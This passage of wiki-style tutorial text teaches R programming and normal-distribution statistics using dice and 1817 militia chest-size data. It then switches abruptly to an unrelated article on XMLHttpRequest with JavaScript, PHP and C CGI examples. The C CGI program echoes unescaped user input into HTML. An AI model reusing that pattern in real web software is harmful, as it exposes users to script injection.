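set.seed( 1 )
second <- sample( size = 1, x = 1:6 )

print( identical( first, second ) )
```

Output:

```
[1] "x"       "size"    "replace" "prob"
[1] TRUE
```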

==== Data coupling ====

The output from a function may become the input to another function. This is the basis for data coupling.{{cite book

| last = Schach

| first = Stephen R.

| title = Software Engineering

| publisher = Aksen Associates Incorporated Publishers

| year = 1990

| page = 231

| isbn = 0-256-08515-3

}}

This example executes the function sample() and sends the result to the function sum(). It simulates the roll of two dice and adds them up.

sum( sample( 1:6, size=2, replace=TRUE ) )

Possible output:

[1] 7

==== Functions as parameters ====

A function's parameters typically receive data. Alternatively, a function (A) can use a parameter to receive another function (B). Function (A) then assumes responsibility for executing function (B).

For example, the function replicate() has an input parameter that accepts an expression, typically a call to another function, which replicate() evaluates repeatedly. This example will execute replicate() once, and replicate() will execute sample() five times. It will simulate rolling a die five times:

replicate( 5, sample( 1:6, size=1 ) )

Possible output:

[1] 2 4 1 4 5
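Strictly speaking, replicate() receives an unevaluated expression rather than a function object. To show a parameter that holds a function object itself, the sketch below uses sapply(), which calls the function it is given once per element. The names roll_die and apply_twice are hypothetical and exist only for this illustration.

```r
# A function object stored in a variable. The parameter is ignored;
# sapply() requires that the function accept one argument.
roll_die <- function( unused ) sample( 1:6, size = 1 )

# sapply() receives roll_die as a parameter and executes it five times.
rolls <- sapply( 1:5, roll_die )
print( rolls )

# A programmer-created function may also accept a function parameter.
apply_twice <- function( f, x ) f( f( x ) )
print( apply_twice( sqrt, 16 ) )
```

Here apply_twice( sqrt, 16 ) takes the square root of 16 and then the square root of that result, giving 2.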

==== Uniform distribution ====

Because each face of a die is equally likely to appear on top, rolling a die many times generates the uniform distribution.{{cite book

| last1 = Downing

| first1 = Douglas

| last2 = Clark

| first2 = Jeffrey

| title = Business Statistics

| publisher = Barron's

| year = 2003

| page = 163

| isbn = 0-7641-1983-4

}} This example displays a histogram of a die rolled 10,000 times:

hist( replicate( 10000, sample( 1:6, size=1 ) ) )

The output is likely to have a flat top:

File:R histogram uniform distribution.pdf
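The flatness of the histogram can also be inspected numerically. This is a minimal sketch, assuming a fixed seed (1, chosen arbitrarily) so the run is repeatable; it draws all 10,000 rolls with a single call to sample() rather than with replicate().

```r
set.seed( 1 )

# sample() can draw all 10,000 rolls in one call.
rolls <- sample( 1:6, size = 10000, replace = TRUE )

# Proportion of rolls landing on each face.
proportions <- table( rolls ) / length( rolls )
print( round( proportions, 3 ) )

# Each proportion should be close to 1/6.
print( 1 / 6 )
```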

==== Central limit theorem ====

A numeric data set may or may not have a central tendency. Nonetheless, the arithmetic means of many samples drawn from it will cluster around the population's mean. The arithmetic mean of a sample is called the sample mean.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 95

| isbn = 0-201-71058-7

}} The central limit theorem states that for a relatively large sample size (as a rule of thumb, 30 or more), the sample mean (\bar{x}) is approximately normally distributed, regardless of the distribution of the variable under consideration (x).{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 314

| isbn = 0-201-71058-7

}} A histogram of many sample means will therefore resemble a bell-shaped curve.

For example, rolling one die many times generates the uniform distribution. Nonetheless, rolling 30 dice and calculating their average (\bar{x}), over and over again, generates an approximately normal distribution.

R program to roll 30 dice 10,000 times and plot the frequency of averages:

hist(

replicate(

10000,

mean(

sample(

1:6,

size=30,

replace=T ) ) ) )

The output is likely to have a bell shape:

File:R histogram sample mean.pdf
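The bell shape can be summarized with two numbers. The sketch below assumes a fixed seed (1, chosen arbitrarily) and relies on a standard result that accompanies the central limit theorem: the standard deviation of the sample mean is the population standard deviation divided by the square root of the sample size. For one fair die the population mean is 3.5 and the variance is 35/12, so the predicted spread for means of 30 rolls is about 0.312.

```r
set.seed( 1 )

sample_means <-
    replicate(
        10000,
        mean( sample( 1:6, size = 30, replace = TRUE ) ) )

# Population values for one fair die.
population_mean <- mean( 1:6 )
population_variance <- mean( ( 1:6 - population_mean )^2 )

# Predicted spread of the sample mean for samples of 30 rolls.
predicted_sd <- sqrt( population_variance / 30 )

# Compare the simulated values with the predicted values.
print( c( mean( sample_means ), population_mean ) )
print( c( sd( sample_means ), predicted_sd ) )
```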

=== Programmer-created functions ===

To create a function object, execute the function() statement and assign the result to a name.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 17

| isbn = 978-1-449-35901-0

}} A function receives input both from global variables and input parameters (often called arguments). Objects created within the function body remain local to the function.

R program to create a function:

# The input parameters are x and y.
# The return value is a numeric double vector.

f <- function(x, y)

{

first_expression <- x * 2

second_expression <- y * 3

first_expression + second_expression

# The return statement may be omitted

# if the last expression is unassigned.

# This will save a few clock cycles.

}

Usage output:

> f(1, 2)

[1] 8

Function arguments are passed in by value.
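A short sketch can illustrate what passing by value means in practice: a change made to a parameter inside the function does not reach the caller's object. The function name double_first is hypothetical.

```r
double_first <- function( v )
{
    # This modifies the function's local copy only.
    v[ 1 ] <- v[ 1 ] * 2
    v
}

original <- c( 1, 2, 3 )
modified <- double_first( original )

# The caller's vector is unchanged; only the returned copy differs.
print( original )
print( modified )
```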

=== Generic functions ===

R supports generic functions, a form of polymorphism. A generic function acts differently depending on the class of the argument passed in: it dispatches the method specific to that class. A common example is R's print() function, which can print almost every class of object by calling print(objectName).{{cite web

|author=R Core Team

|title=Print Values

|url=https://stat.ethz.ch/R-manual/R-devel/library/base/html/print.html

|access-date=30 May 2016

|website=R Documentation

|publisher=R Foundation for Statistical Computing}}
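Programmers may also write their own generic functions. The following is a minimal sketch using R's S3 dispatch mechanism; the generic name describe and its methods are hypothetical and were invented for this illustration.

```r
# The generic function dispatches on the class of its first argument.
describe <- function( x, ... ) UseMethod( "describe" )

describe.numeric <- function( x, ... )
    paste( "a number with mean", mean( x ) )

describe.character <- function( x, ... )
    paste( "text with", length( x ), "element(s)" )

# Fallback when no class-specific method exists.
describe.default <- function( x, ... )
    paste( "an object of class", class( x )[ 1 ] )

print( describe( c( 2, 4 ) ) )
print( describe( "hello" ) )
print( describe( TRUE ) )
```

The method name after the dot is what R matches against the argument's class, so adding support for a new class only requires defining one more function.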

== If statements ==

R program illustrating if statements:

minimum <- function( a, b )

{

if ( a < b )

minimum <- a

else

minimum <- b

return( minimum )

}

maximum <- function( a, b )

{

if ( a > b )

maximum <- a

else

maximum <- b

return( maximum )

}

range <- function( a, b, c )

{

range <-

maximum( a, maximum( b, c ) ) -

minimum( a, minimum( b, c ) )

return( range )

}

range( 10, 4, 7 )

Output:

[1] 6
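For comparison, base R already supplies min(), max(), and range(). The program above defines its own range(), which masks the base function of the same name for the rest of the session, so this sketch assumes a fresh session. The variable names are arbitrary.

```r
values <- c( 10, 4, 7 )

# max() and min() accept any number of values.
spread <- max( values ) - min( values )
print( spread )

# Base R's range() returns the minimum and maximum as a pair;
# diff() subtracts the first from the second.
print( diff( range( values ) ) )
```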

== Programming shortcuts ==

R provides three notable shortcuts available to programmers.

=== Omit the print() function ===

If an object is present on a line by itself, then the interpreter will send the object to the print() function.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 147

| quote = R calls print each time it displays a result in your console window.

| isbn = 978-1-449-35901-0

}}

R example:

integer <- 82L

integer

Output:

[1] 82

=== Omit the return() statement ===

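If a programmer-created function omits the return() statement, then the interpreter will return the value of the last expression evaluated. If that expression is an assignment, the value is returned invisibly and is not printed automatically.{{cite book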

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 17

| quote = R will execute all of the code in the body and then return the result of the last line of code.

| isbn = 978-1-449-35901-0

}}

R example:

f <- function()

{

# Don't assign the expression to an object.

82L + 1L

}

Usage output:

> f()

[1] 83

=== Alternate assignment operator ===

The symbol-pair <- assigns a value to an object. Alternatively, = may be used as the assignment operator. However, care must be taken because = closely resembles the relational operator for equality, which is ==.{{cite book

| last = Grolemund

| first = Garrett

| title = Hands-On Programming with R

| publisher = O'Reilly

| year = 2014

| page = 82

| quote = Be careful not to confuse = with ==. = does the same thing as <-.

| isbn = 978-1-449-35901-0

}}

R example:

integer = 82L

print( integer )

Output:

[1] 82

== Normal distribution ==

If a numeric data set has a central tendency, it also may have a symmetric looking histogram — a shape that resembles a bell. If a data set has an approximately bell-shaped histogram, it is said to have a normal distribution.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 256

| isbn = 0-201-71058-7

}}

=== Chest size of Scottish militiamen data set ===

In 1817, a Scottish army contractor measured the chest sizes of 5,732 members of a militia unit. The frequency of each size was:{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 257

| isbn = 0-201-71058-7

}}

{| border="1" class="wikitable"
! Chest size (inches)
! Frequency
|-
| align="right" | 33
| align="right" | 3
|-
| align="right" | 34
| align="right" | 19
|-
| align="right" | 35
| align="right" | 81
|-
| align="right" | 36
| align="right" | 189
|-
| align="right" | 37
| align="right" | 409
|-
| align="right" | 38
| align="right" | 753
|-
| align="right" | 39
| align="right" | 1062
|-
| align="right" | 40
| align="right" | 1082
|-
| align="right" | 41
| align="right" | 935
|-
| align="right" | 42
| align="right" | 646
|-
| align="right" | 43
| align="right" | 313
|-
| align="right" | 44
| align="right" | 168
|-
| align="right" | 45
| align="right" | 50
|-
| align="right" | 46
| align="right" | 18
|-
| align="right" | 47
| align="right" | 3
|-
| align="right" | 48
| align="right" | 1
|}

=== Create a comma-separated values file ===

R has the write.csv() function to convert a data frame into a CSV file.

R program to create chestsize.csv:

chestsize <-

c( 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48 )

frequency <-

c( 3, 19, 81, 189, 409, 753, 1062, 1082, 935, 646, 313, 168, 50, 18, 3, 1 )

dataFrame <- data.frame( chestsize, frequency )

write.csv(

dataFrame,

file="chestsize.csv",

# By default, write.csv() creates the first column as the row number.

row.names = FALSE )
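To see exactly what write.csv() produces, a small data frame can be written and read back. This is a sketch only: it uses the first three rows of the data set and writes to a temporary file (via tempfile()) so that an existing chestsize.csv is not overwritten.

```r
dataFrame <- data.frame(
    chestsize = c( 33, 34, 35 ),
    frequency = c( 3, 19, 81 ) )

# tempfile() returns a unique path in the session's temporary directory.
csvFile <- tempfile( fileext = ".csv" )

write.csv( dataFrame, file = csvFile, row.names = FALSE )

# Display the raw text that was written.
writeLines( readLines( csvFile ) )

# Read the file back into a new data frame.
restored <- read.csv( csvFile )
print( restored )
```

The first line of the file is the header row, and each following line holds one row of the data frame.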

=== Import a data set ===

The first step in data science is to import a data set.{{cite book

| last1 = Wickham

| first1 = Hadley

| last2 = Cetinkaya-Rundel

| first2 = Mine

| last3 = Grolemund

| first3 = Garrett

| title = R for Data Science, Second Edition

| publisher = O'Reilly

| year = 2023

| page = xiii

| isbn = 978-1-492-09740-2

}}

R program to import chestsize.csv into a data frame:

dataFrame <- read.csv( "chestsize.csv" )

print( dataFrame )

Output:

chestsize frequency

1 33 3

2 34 19

3 35 81

4 36 189

5 37 409

6 38 753

7 39 1062

8 40 1082

9 41 935

10 42 646

11 43 313

12 44 168

13 45 50

14 46 18

15 47 3

16 48 1

=== Transform a data set ===

The second step in data science is to transform the data into a format that the functions expect. The chest-size data set is summarized by frequency; however, R's normal distribution functions require a numeric double vector.

R function to convert a frequency-summarized data frame into a vector:

# Filename: frequencyDataFrameToVector.R

frequencyDataFrameToVector <-
    function(
        dataFrame,
        dataColumnName,
        frequencyColumnName = "frequency" )
{
    # Double brackets extract a column by the name stored in a variable.
    dataVector <- dataFrame[[ dataColumnName ]]
    frequencyVector <- dataFrame[[ frequencyColumnName ]]

    vectorIndex <- 1
    frequencyIndex <- 1
    vector <- NA

    for ( datum in dataVector )
    {
        frequency <- frequencyVector[ frequencyIndex ]

        # seq_len() yields no iterations when the frequency is zero.
        for ( i in seq_len( frequency ) )
        {
            vector[ vectorIndex ] <- datum
            vectorIndex <- vectorIndex + 1
        }

        frequencyIndex <- frequencyIndex + 1
    }

    return ( vector )
}
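The same expansion can be sketched with base R's rep() function, which repeats each element of its first argument by the matching count in times. The example rebuilds the data frame inline so that it runs without chestsize.csv.

```r
dataFrame <- data.frame(
    chestsize = 33:48,
    frequency = c( 3, 19, 81, 189, 409, 753, 1062, 1082,
                   935, 646, 313, 168, 50, 18, 3, 1 ) )

# rep() repeats each chest size by its corresponding frequency.
chestSizeVector <- rep( dataFrame$chestsize, times = dataFrame$frequency )

print( head( chestSizeVector ) )
print( length( chestSizeVector ) )
print( mean( chestSizeVector ) )
```

Because rep() is vectorized, it avoids the nested loops and builds the 5,732-element vector in a single call.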

R has the source() function to include another R source file into the current program.

R program to load and display a summary of the 5,732 member data set:

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

"chestsize" )

message( "Head:" )

head( chestSizeVector )

message( "\nTail:" )

tail( chestSizeVector )

message( "\nCount:" )

length( chestSizeVector )

message( "\nMean:" )

mean( chestSizeVector )

message( "\nStandard deviation:" )

sd( chestSizeVector )

Output:

Head:

[1] 33 33 33 34 34 34

Tail:

[1] 46 46 47 47 47 48

Count:

[1] 5732

Mean:

[1] 39.84892

Standard deviation:

[1] 2.073386

=== Visualize a data set ===

The third step in data science is to visualize the data set. If a histogram of a data set resembles a bell shape, then the data set is approximately normally distributed.

R program to display a histogram of the data set:

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

"chestsize" )

hist( chestSizeVector )

Output:

File:Histogram chestsize vector.pdf

=== Standardized variable ===

Any variable (x_i) in a data set can be converted into a standardized variable (z_i). The standardized variable is also known as a z-score.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 133

| isbn = 0-201-71058-7

}} To calculate the z-score, subtract the mean and divide by the standard deviation.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 134

| isbn = 0-201-71058-7

}}

:Let x = a set of data points.

:Let \bar{x} = the mean of the data set.

:Let \sigma = the standard deviation of the data set.

:Let x_i = the i^{th} element in the set.

:Let z_i = the z-score of the i^{th} element in the set.

:z_i = \frac{x_i - \bar{x}}{\sigma}

R function to convert a measurement to a z-score:

# Filename: zScore.R

zScore <- function( measurement, mean, standardDeviation )

{

( measurement - mean ) / standardDeviation

}

R program to convert a chest size measurement of 38 to a z-score:

source( "zScore.R" )

print( zScore( 38, 39.84892, 2.073386 ) )

Output:

[1] -0.8917394

R program to convert a chest size measurement of 42 to a z-score:

source( "zScore.R" )

print( zScore( 42, 39.84892, 2.073386 ) )

Output:

[1] 1.037472

=== Standardized data set ===

A standardized data set is a data set in which each member of an input data set was run through the zScore function.

R function to convert a numeric vector into a z-score vector:

# Filename: zScoreVector.R

source( "zScore.R" )

zScoreVector <- function( vector )
{
    # Compute the mean and standard deviation once, not once per element.
    vectorMean <- mean( vector )
    vectorStandardDeviation <- sd( vector )

    # zScore() uses vectorized arithmetic, so it accepts the whole vector.
    zScore( vector, vectorMean, vectorStandardDeviation )
}
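Base R's scale() function performs the same standardization. The sketch below, which uses an arbitrary eight-element vector, compares scale() with the subtract-and-divide formula and confirms that the standardized data set has a mean of 0 and a standard deviation of 1.

```r
vector <- c( 2, 4, 4, 4, 5, 5, 7, 9 )

# Vectorized arithmetic standardizes every element in one expression.
manual <- ( vector - mean( vector ) ) / sd( vector )

# scale() returns a one-column matrix; as.vector() flattens it.
builtIn <- as.vector( scale( vector ) )

print( all.equal( manual, builtIn ) )
print( round( c( mean( manual ), sd( manual ) ), 10 ) )
```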

=== Standardized chest size data set ===

R program to standardize the chest size data set:

source( "frequencyDataFrameToVector.R" )

source( "zScoreVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

zScoreVector <-

zScoreVector(

chestSizeVector )

message( "Head:" )

head( zScoreVector )

message( "\nTail:" )

tail( zScoreVector )

message( "\nCount:" )

length( zScoreVector )

message( "\nMean:" )

round( mean( zScoreVector ) )

message( "\nStandard deviation:" )

sd( zScoreVector )

hist( zScoreVector )

Output:

Head:

[1] -3.303253 -3.303253 -3.303253 -2.820950 -2.820950 -2.820950

Tail:

[1] 2.966684 2.966684 3.448987 3.448987 3.448987 3.931290

Count:

[1] 5732

Mean:

[1] 0

Standard deviation:

[1] 1

File:Histogram zscore.pdf

=== Standard normal curve ===

File:Gaussian distribution 2.jpg

A histogram of a normally distributed data set that is converted to its standardized data set also resembles a bell-shaped curve. The curve is called the standard normal curve or the z-curve. The four basic properties of the z-curve are:{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 266

| isbn = 0-201-71058-7

}}

  1. The total area under the curve is 1.
  2. The curve extends indefinitely to the left and right. It never touches the horizontal axis.
  3. The curve is symmetric and centered at 0.
  4. Almost all of the area under the curve lies between -3 and 3.
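The four properties can be checked numerically with base R's dnorm() (the height of the curve), pnorm() (the area to the left of a z-score), and integrate(). This is a sketch; the test points 10 and 1.5 are arbitrary.

```r
# Property 1: the total area under the curve is 1.
totalArea <- integrate( dnorm, -Inf, Inf )$value

# Property 2: the height is positive even far from the center.
heightAtTen <- dnorm( 10 )

# Property 3: the curve is symmetric about 0.
symmetric <- isTRUE( all.equal( dnorm( -1.5 ), dnorm( 1.5 ) ) )

# Property 4: almost all of the area lies between -3 and 3.
areaWithinThree <- pnorm( 3 ) - pnorm( -3 )

print( totalArea )
print( heightAtTen > 0 )
print( symmetric )
print( areaWithinThree )
```

The last value is approximately 0.9973, which is the sense in which "almost all" of the area lies within three standard deviations of the center.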

=== Area under the standard normal curve ===

The probability that a future measurement will fall within a designated range is equal to the area under the standard normal curve between the z-scores of the range's two endpoints.{{cite book

| last = Weiss

| first = Neil A.

| title = Elementary Statistics, Fifth Edition

| publisher = Addison-Wesley

| year = 2002

| page = 265

| isbn = 0-201-71058-7

}}

For example, suppose the Scottish militia's quartermaster wanted to stock up on uniforms. What is the probability that the next recruit will need a size between 38 and 42?

R program:

library( tigerstats )

source( "frequencyDataFrameToVector.R" )

source( "zScore.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

zScore38 <-

zScore( 38, mean( chestSizeVector ), sd( chestSizeVector ) )

zScore42 <-

zScore( 42, mean( chestSizeVector ), sd( chestSizeVector ) )

areaLeft38 <- tigerstats::pnormGC( zScore38 )

areaLeft42 <- tigerstats::pnormGC( zScore42 )

areaBetween <- areaLeft42 - areaLeft38

message( "Probability:" )

print( areaBetween )

Output:

Probability:

[1] 0.6639757

The pnormGC() function can compute the probability between a range without first calculating the z-score.

R program:

library( tigerstats )

source( "frequencyDataFrameToVector.R" )

dataFrame <- read.csv( "chestsize.csv" )

chestSizeVector <-

frequencyDataFrameToVector(

dataFrame,

dataColumnName = "chestsize" )

areaBetween <-

tigerstats::pnormGC(

c( 38, 42 ),

mean = mean( chestSizeVector ),

sd = sd( chestSizeVector ),

region = "between",

graph = TRUE )

message( "Probability:" )

print( areaBetween )

Output:

Probability:

[1] 0.6639757

File:Normal pnormGC.pdf
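If the tigerstats package is not installed, base R's pnorm() function can serve as a stand-in. The sketch below hard-codes the mean and standard deviation reported earlier for the chest-size data set, so it runs without the CSV file or the helper functions.

```r
# Mean and standard deviation reported for the chest-size data set.
chestMean <- 39.84892
chestSd <- 2.073386

# pnorm() returns the area to the left of a measurement.
areaLeft38 <- pnorm( 38, mean = chestMean, sd = chestSd )
areaLeft42 <- pnorm( 42, mean = chestMean, sd = chestSd )

# The area between the two measurements is the difference.
areaBetween <- areaLeft42 - areaLeft38
print( areaBetween )
```

The result should agree with the pnormGC() output to within rounding of the hard-coded inputs.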

XMLHttpRequest

XMLHttpRequest is a JavaScript class containing methods to asynchronously transmit HTTP requests from a web browser to a web server.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 92

| isbn = 978-0-596-10180-0

| quote = Javascript lacks a portable mechanism for general network communication[.] ... But thanks to the XMLHttpRequest object, ... Javascript code can make HTTP calls back to its originating server[.]

}} The methods allow a browser-based application to make a fine-grained server call and store the result in the XMLHttpRequest responseText attribute.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 92

| isbn = 978-0-596-10180-0

}} The XMLHttpRequest class is a component of Ajax programming. Without Ajax, the "Submit" button will send to the server an entire HTML form. The server will respond by returning an entire HTML page to the browser.

=Constructor=

Generating an asynchronous request to the web server first requires instantiating (allocating the memory of) the XMLHttpRequest object. The allocated memory is assigned to a variable. The JavaScript keyword that instantiates a new object is new.{{cite book

| last = Flanagan

| first = David

| title = JavaScript, The Definitive Guide

| publisher = O'Reilly and Associates

| year = 1998

| page = 82

| isbn = 1-56592-392-8}} The new statement is followed by the constructor function of the object. By convention in object-oriented languages, the constructor function has the same name as the class.{{cite book

| last1 = Welling

| first1 = Luke

| last2 = Thomson

| first2 = Laura

| title = PHP and MySQL Web Development

| publisher = Sams Publishing

| year = 2005

| page = 162

| isbn = 0-672-32672-8

}} In this case, the class name is XMLHttpRequest. To instantiate a new XMLHttpRequest and assign it to the variable named request:

var request = new XMLHttpRequest();{{cite web

| title=XMLHttpRequest Standard; The constructor

| url=https://xhr.spec.whatwg.org/#constructors

| access-date=2023-04-10

}}

=The ''open'' method=

The open method prepares the XMLHttpRequest.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 100

| isbn = 978-0-596-10180-0

}} It can accept up to five parameters, but requires only the first two.

var request = new XMLHttpRequest();

request.open( RequestMethod, SubmitURL, AsynchronousBoolean, UserName, Password );

  • RequestMethod: The HTTP request method may be GET for smaller quantities of data. Among the other request methods available, POST will handle substantial quantities of data.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 96

| quote = POST, for example, is suited to calls that affect server state or upload substantial quantities of data.

| isbn = 978-0-596-10180-0

}} Other request methods are available. DELETE, for example, asks the web server to remove the resource identified by the SubmitURL.{{cite web

| title=HTTP Documentation

| date=June 2022

| url=https://httpwg.org/specs/rfc9110.html#method.overview

| access-date=2023-04-12

}} Sending DELETE does not free the XMLHttpRequest object's memory; the browser reclaims that memory through garbage collection once the object is no longer referenced.

  • SubmitURL: The SubmitURL is a URL containing the execution filename and any parameters that get submitted to the web server. If the URL contains the host name, it must be the web server that sent the HTML document. Ajax supports the same-origin policy.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 98

| isbn = 978-0-596-10180-0

}}

  • AsynchronousBoolean: If supplied, it should be set to true. If set to false, then the browser will wait until the return string is received. Setting AsynchronousBoolean to false is discouraged, and browsers may throw an exception.{{cite web

| title=XMLHttpRequest Standard; The open method

| url=https://xhr.spec.whatwg.org/#the-open()-method

| access-date=2023-04-12

}}

  • UserName: If supplied, it will help authenticate the user.
  • Password: If supplied, it will help authenticate the user.

=The ''setRequestHeader'' method=

If the request method of POST is invoked, then the additional step of sending the media type of Content-Type: application/x-www-form-urlencoded is required.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 97

| isbn = 978-0-596-10180-0

}} The setRequestHeader method allows the program to send this or other HTTP headers to the web server. Its usage is setRequestHeader( HeaderField, HeaderValue ). To enable the POST request method:

: * request.setRequestHeader( "Content-Type", "application/x-www-form-urlencoded" );

=The ''send'' method=

If the request method of POST is invoked, then the web server expects the form data to be read from the standard input stream.{{cite book

| last = Flanagan

| first = David

| title = JavaScript, The Definitive Guide

| publisher = O'Reilly and Associates

| year = 1998

| page = 511

| isbn = 1-56592-392-8}} To send the form data to the web server, execute request.send( FormData ), where FormData is a text string. If the request method of GET is invoked, then the web server expects only the default headers.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}} To send the default headers, execute request.send( null ).{{efn|The null argument is optional because the body parameter defaults to null; passing it explicitly remains common practice.}}

=The ''onreadystatechange'' event listener=

onreadystatechange is a callback method that is executed each time the readyState attribute changes during the Ajax lifecycle.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 25

| isbn = 978-0-596-10180-0

}} To set a callback method named listenMethod(), the syntax is request.onreadystatechange = listenMethod.{{efn|For safety, this assignment should follow the execution of request.open().}} For convenience, the syntax allows for an anonymous method to be defined. To define an anonymous callback method:

var request = new XMLHttpRequest();

request.onreadystatechange = function()

{

// code omitted

}

The XMLHttpRequest lifecycle progresses through several stages – from 0 to 4. Stage 0 is before the open() method is invoked, and stage 4 is when the text string has arrived.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}} To monitor the lifecycle, XMLHttpRequest has available the readyState attribute. Early browsers interpreted stages 1-3 differently. One interpretation, shown with the constant names that the XMLHttpRequest Standard now assigns, is:

  • Stage 0: Uninitialized (UNSENT)
  • Stage 1: Loading (OPENED)
  • Stage 2: Loaded (HEADERS_RECEIVED)
  • Stage 3: Interactive (LOADING)
  • Stage 4: Completed (DONE)

When readyState reaches 4, then the text string has arrived and is set in the responseText attribute.

var request = new XMLHttpRequest();

request.onreadystatechange = function()

{

if ( request.readyState == 4 )

{

// request.responseText is set

}

}

=Linux examples=

Upon request, the browser will execute a JavaScript function to transmit a request for the web server to execute a computer program. The computer program may be the PHP interpreter, another interpreter, or a compiled executable. In any case, the JavaScript function expects a text string to be transmitted back and stored in the responseText attribute.{{cite book

| last = Mahemoff

| first = Michael

| title = Ajax Design Patterns

| publisher = O'Reilly

| year = 2006

| page = 26

| isbn = 978-0-596-10180-0

}}

To create an example JavaScript function:

  • cd /var/www/html
  • Edit a file named ajax_submit.js:

function ajax_submit( destination_division, submit_url, person_name )
{
    var request = new XMLHttpRequest();
    var completed_state = 4;

    // Encode the name so that spaces and symbols survive in the URL.
    submit_url = submit_url + "?person_name=" + encodeURIComponent( person_name );

    request.open( "GET", submit_url, true );

    // Assign the listener before sending so that no state change is missed.
    request.onreadystatechange = function()
    {
        if ( request.readyState == completed_state )
        {
            document.
                getElementById( destination_division ).
                innerHTML =
                    request.responseText;
        }
    };

    request.send( null );
}

=PHP example=

PHP is a scripting language designed specifically to interface with HTML.{{cite book

| last1 = Welling

| first1 = Luke

| last2 = Thomson

| first2 = Laura

| title = PHP and MySQL Web Development

| publisher = Sams Publishing

| year = 2005

| page = 2

| isbn = 0-672-32672-8

| quote = PHP is a server-side scripting language designed specifically for the Web.

}} Because the PHP engine is an interpreter – interpreting program statements as they are read – there are programming limitations{{efn|Whereas PHP is a rich language and interfaces well with certain databases, it supports only a subset of container types and lacks declarative language constructs.}} and performance costs.{{efn|An interpreter executes each programming statement; however, a compiled program has each machine instruction ready for the CPU.}} Nonetheless, PHP is simple to deploy: the XMLHttpRequest set of files may all reside in the same working directory – probably /var/www/html.

==PHP server component==

The server component of a PHP XMLHttpRequest is a file located on the server that does not get transmitted to the browser. Instead, the PHP interpreter will open this file and read in its PHP instructions. The XMLHttpRequest protocol requires an instruction to output a text string.

  • cd /var/www/html
  • Edit a file named ajax_server.php:

<?php
    $person_name = $_GET[ 'person_name' ];

    // Escape the name before echoing it into HTML.
    echo "Hello " . htmlspecialchars( $person_name );
?>

==PHP browser component==

The browser component of a PHP XMLHttpRequest is a file that gets transmitted to the browser. The browser will open this file and read in its HTML instructions.

  • cd /var/www/html
  • Edit a file named ajax_php.html:

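<!DOCTYPE html>
<title>Hello World</title>
<script src="ajax_submit.js"></script>
<p>What is your name? <input type="text" id="person_name"></p>
<div id="destination_division"></div>
<button
    onclick="ajax_submit(
        'destination_division',
        'ajax_server.php',
        document.getElementById( 'person_name' ).value )">
    Submit
</button>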

  1. Point your browser to http://localhost/ajax_php.html
  2. Type in your name.
  3. Press Submit

=CGI example=

The Common Gateway Interface (CGI) process allows a browser to request the web server to execute a compiled computer program.{{efn|The web server may be configured to execute interpreted programs, also.{{cite web

| title=Apache Tutorial

| url=https://httpd.apache.org/docs/2.4/howto/cgi.html

| access-date=2023-04-10

}}}}

==CGI server component==

The server component of a CGI XMLHttpRequest is an executable file located on the server. The operating system will open this file and read in its machine instructions. The XMLHttpRequest protocol requires an instruction to output a text string.

Compiled programs have two files: the source code and a corresponding executable.

  • cd /usr/lib/cgi-bin
  • Edit a file named ajax_server.c:

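#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main( void )
{
    char *query_string;
    char *person_name;

    query_string = getenv( "QUERY_STRING" );

    /* Guard against a missing or malformed query string. */
    if ( !query_string
    ||   strncmp( query_string, "person_name=", strlen( "person_name=" ) ) != 0 )
    {
        person_name = "";
    }
    else
    {
        /* Skip "person_name=" */
        person_name = query_string + strlen( "person_name=" );
    }

    /* CGI requires the first line to output: */
    printf( "Content-type: text/html\n" );

    /* CGI requires the second line to output: */
    printf( "\n" );

    printf( "Hello %s\n", person_name );

    return 0;
}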

  • Compile the source code to create the executable:

